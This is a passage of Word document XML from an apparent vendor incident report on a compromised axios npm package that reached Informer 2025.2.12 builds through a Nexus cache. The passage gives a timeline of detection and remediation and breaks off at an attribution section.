                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA1B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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19" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, 23:25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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1A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> initiates security hold on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA1E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA1C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Mar 31, 00:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA1D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> publishes security stub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-js@0.0.1-security.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA21" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE8E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA1F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Mar 31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (daytime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE8E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA20" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Informer 2025.2.12 GA build </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>distributables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> are created</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>ibm_db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> transitive </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dependency resolves to the compromised </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Nexus cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA24" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA22" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Mar 31 – Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA23" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2025.2.12 GA builds are distributed to clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA27" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA25" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA26" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Client reports their security scan flagged attempted attack by </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios@1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> a known compromised package in their Informer 2025.2.12 installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA2A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA28" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA29" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Entrinsik confirms compromised </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios@1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is present in Nexus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> registry cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA2D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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2B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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2C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>All March 31 builds of 2025.2.12 taken down from distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA2E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA2F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nexus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> registry and cache cleansed; build servers sanitized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA33" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA31" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tue Apr 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA32" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Client notifications initiated with diagnosis and remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFA34" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> that triggered the Nexus cache poisoning cannot be attributed to a specific person or deployment. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sonatype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nexus Repository does not archive logs after rotation, and the relevant logs from March 30 are no longer available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA35" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>3. The Upstream Attack Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA36" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.1 Attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA37" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Threat Intelligence has attributed this attack to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
